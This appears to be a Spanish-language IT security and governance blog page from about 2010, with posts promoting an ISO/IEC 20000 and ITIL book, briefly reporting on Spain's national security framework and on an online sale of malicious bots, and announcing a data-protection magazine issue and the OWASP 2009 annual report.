Cómo transformar la gestión del servicio de TI utilizando ISO20000 e ITIL. Un tratado que realiza un análisis detallado de la Norma ISO/IEC 20000 y que aúna la experiencia de su implantación en importantes empresas utilizando las mejores prácticas ITIL®
este libro explica claramente cómo mejorar los servicios de tecnologías de la información (TI) que se prestan al negocio. Se centra en explicar y facilitar la comprensión de las Normas ISO/IEC 20000 con un enfoque práctico, para que su implantación resulte efectiva en cualquier tipo de organización que provea servicios de tecnología, tanto internamente a su organización como externamente al mercado, tanto en grandes organizaciones como en pequeñas o medianas empresas (pymes).

Este libro va dirigido a todos los profesionales del ámbito de las tecnologías de la información y las comunicaciones que estén involucrados en la provisión de servicios. Resultará imprescindible tanto a los responsables de su gestión, como a cualquier otro profesional de TI: dirección, gestores, responsables de procesos, consultores, técnicos, personal de soporte, formadores, profesorado universitario, investigadores, certificadores, auditores, etc.
Persiguiendo este fin último de utilidad, los contenidos de cada apartado, además de incluir íntegramente los textos de la Parte 1 y Parte 2 de la Norma, se han enriquecido con otras buenas prácticas ITIL, con los estándares internos de gestión de Telefónica y con la amplia experiencia profesional de los autores. Esta fusión de conocimiento convierte a este libro en un tratado de valor único para el Sector.
Para facilitar la comprensión de los conceptos, contiene más de 300 ésquemas e ilustraciones.

CONTENIDO: se estructura siguiendo el índice original de la Norma.
- El camino a la excelencia ya existe
- Entender las Normas ISO/IEC 20000
- El Sistema de Gestión del Servicio de TI (SGSTI)
- Planificación e implementación de la gestión del servicio
- Planificación e implementación de nuevos servicios o de servicios modificados
- Procesos de provisión de servicio
- Procesos de relaciones
- Procesos de resolución
- Procesos de control
- Procesos de entrega
- La certificación conforma a ISO/IEC 20000 de la gestión del servicio de TI

Descarga de capitulo muestra

• ISBN 978-84-8143-662-4
• Edita AENOR. Tapa dura. 775 páginas
• Autores: Luis Morán Abad, Alejandro Pérez Sánchez, Juan Trujillo Gaona, Miguel José González-Simancas Sanz, David Bathiel y Fernández. También han colaborado: AENOR y otros destacados profesionales de Telefónica y del Sector.
Cómo transformar la gestión del servicio de TI utilizando ISO20000 e ITIL. Un tratado que realiza un análisis detallado de la Norma ISO/IEC 20000 y que aúna la experiencia de su implantación en importantes empresas utilizando las mejores prácticas ITIL®
El Libro se puede comprar en Venta de Libros de itSMF.es

Next Generation Web Scanning - A case study

Next Generation Web Scanning

Esquema Nacional de Seguridad y su aplicación en las AA.PP (España)

Presentamos a continuacion un breve análisis del Esquema Nacional de Seguridad (ENS) el cual tiene muchas similitudes con la norma ISO 27001.

REAL DECRETO 3/2010 (29/1/2010)

View more presentations from ramessarwat.

Otra muestra de cómo funciona el negocio de los piratas informáticos

A través de un sitio web, cualquier usuario puede comprar un programa malicioso para diferentes propósitos. Los servicios tienen un costo que va desde los u$s95 hasta u$s275. La adquisición de todo el “catálogo” cuesta u$s4.500.

Una empresa de seguridad informática detectó una red de venta de bots especializados en redes sociales y sistemas de correo gratuitos.

Más

Visto en INFOBAE

Revista Datos Personales # 45 (Mayo 2010)

Ya está disponible el número 45 de la revista digital datospersonales.org (mayo 2010), editada por la Agencia de Protección de Datos de la Comunidad de Madrid.

En este número:
`Excelentes noticias para la protección de datos en México: el nacimiento de una nueva Ley ´, por Melissa Higuera Pérez.Subdirectora de Clasificación y Datos Personales “B” en el Instituto Federal de Acceso a la Información Pública de México (IFAI).

`Novedades en materia de protección de datos en la nueva Ley de Seguridad Vial ´, por Enrique García Romero. Adjunto al Departamento de Recursos de Multas de circulación en el Ayuntamiento de Madrid.

Varios países europeos investigan los datos privados recolectados por Street View.

El Congreso de los Diputados aprueba por unanimidad una proposición no de Ley relativa a la difusión y promoción de la iniciativa de estándares internacionales de privacidad.

La APDCM presenta el libro `Principios y derechos de protección de datos personales: Doctrina de la Agencia de Protección de Datos de la Comunidad de Madrid 2002 – 2009´.

La APDCM edita otra revista digital en inglés con el título de Data Protection Review (www.dataprotectionreview.eu) con contenidos distintos y diferenciados de datospersonales.org, puede suscribirse gratuitamente completando el siguiente formulario.

OWASP Annual Report 2009

El 27 de Mayo se publico el "OWASP Annual Report 2009":

You’ll find details on our strategy, our finances, and the activities of all of our global committees. We’ve made some decent progress in 2009, but nothing compared to what the world needs right now.

OWASP is a remarkable organization that I’m proud to serve. Thank you all for your contributions, participation, and energy! Please help us by blogging, tweeting, facebooking, speaking at conferences, writing papers, and whatever else you can do to reach developers wherever they are.


Descarga Reporte (EN, PDF 21 Pag.)